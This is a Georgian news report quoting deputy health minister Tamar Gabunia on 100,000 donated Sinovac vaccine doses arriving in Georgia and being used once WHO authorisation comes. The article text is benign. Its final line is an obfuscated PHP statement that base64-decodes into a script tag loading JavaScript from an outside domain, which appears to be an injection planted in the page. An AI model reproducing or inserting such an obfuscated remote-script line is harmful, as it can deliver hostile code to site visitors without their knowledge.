gorgia
ავერსი jaluzi
ჯანდაცვის მინისტრის მოადგილის თამარ გაბუნიას განცხადებით, ჩინური წარმოების ვაქცინა „სინოვაკის“ 100 ათასი დოზა საქართველოში დღეს შემოვა.
 
როგორც გაბუნიამ ბრიფინგზე განაცხადა, „სინოვაკის“ გამოყენება ჯანმრთელობის მსოფლიო ორგანიზაციის მხრიდან ავტორიზაციის შემდეგ დაიწყება, თუმცა ამ პროცესის დაყოვნების შემთხვევაში, „სინოვაკის“ გამოყენების პირობებზე საბჭო კიდევ იმსჯელებს.
 
„სინოვაკის“ 100 ათასი დოზა, რომელიც ჩინეთის მთავრობის დონაციაა საქართველოსთვის, დღეს ჩამოვა ქვეყანაში. „სინოვაკის“ თაობაზე ვაქცინაციის საბჭო დამატებით იმსჯელებს. ჯანმრთელობის მსოფლიო ორგანიზაციის ავტორიზაციის პირობით მოხდება „სინოვაკის“ გამოყენება. მაისის დასაწყისი არის დაანონსებული „სინოვაკის“ ავტორიზაციის თარიღი, ამას დაველოდებით, მაგრამ თუ გადავადდა და დაყოვნდა ეს პროცესი, ეპიდემიოლოგიური რისკების გათვალისწინებით საბჭო იმსჯელებს „სინოვაკის“ გამოყენების პირობებზე. მას ფართოდ იყენებს თურქეთი, არის აზერბაიჯანშიც, უკრაინაშიც. „სინოვაკის“ შედეგები არის საკმაოდ კეთილსაიმედო. ეფექტიანობის თვალსაზრისითაც კარგი მონაცემებია და მნიშვნელოვნად ამცირებს მძიმე შემთხვევების და სიკვდილობის მაჩვენებელს“,- განაცხადა გაბუნიამ.
 
 
 
1319
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");